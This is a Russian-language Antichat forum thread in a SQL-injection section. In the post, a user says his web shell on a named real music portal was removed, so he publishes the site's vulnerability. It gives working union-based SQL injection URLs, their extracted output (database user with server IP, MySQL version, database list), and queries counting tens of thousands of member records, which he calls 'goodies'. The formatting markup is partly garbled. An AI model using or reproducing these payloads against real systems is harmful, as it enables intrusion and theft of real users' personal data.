HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 27.04.2012, 18:12
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Так как спустя полгода мой шелл снесли, выкладываю в паблик

Крупный музыкальный портал (типа zay[antigoogle]cev.net)

www.bia2.com

PR = 5

Inject

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]_ttp[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.bia2.com/horoscopes/horoscopes_today.php?id=99+and+1=2+union+select+null,null,null,null,null,@@version,null,null,null,null,null,null,null,null[/COLOR][/COLOR] 
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]_ttp<font color="Orange">Current User:     root@50.97.140.227

Sql Version:     5.0.77

Current DB:     soltan_horoscope

Data Bases:     

<div style="margin:20px; margin-top:5px">
    <div class="smallfont" style="margin-bottom:2px">Код:</div>
    <pre class="alt2" dir="ltr" style="
        margin: 0px;
        padding: 6px;
        border: 1px inset;
        width: 640px;
        height: 290px;
        text-align: left;
        overflow: auto">Code:
information_schema
mysql
nyre
r1soft_saved_database_XzZYj0
r1soft_saved_database_aGNipq
soltan_bia2
soltan_horoscope
soltan_ivbd1
soltan_jokes
soltan_mp3
soltan_music
soltan_pourya
soltan_prankcalls
soltan_review
soltan_users
soltan_video</pre>
</div>Немного о вкусняшках;

1БД юзверей около 35к

</font>[COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.bia2.com/horoscopes/horoscopes_today.php?id=99+and+1=2+union+select+null,null,null,null,null,%28SELECT+count%28*%29+FROM+%60soltan_ivbd1%60.ibf_members%29,null,null,null,null,null,null,null,null[/COLOR][/COLOR] 
2) БД юзверей - около 72к

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]_ttp[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.bia2.com/horoscopes/horoscopes_today.php?id=99+and+1=2+union+select+null,null,null,null,null,%28SELECT+count%28*%29+FROM+%60soltan_users%60.users%29,null,null,null,null,null,null,null,null[/COLOR][/COLOR] 
[/COLOR]
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ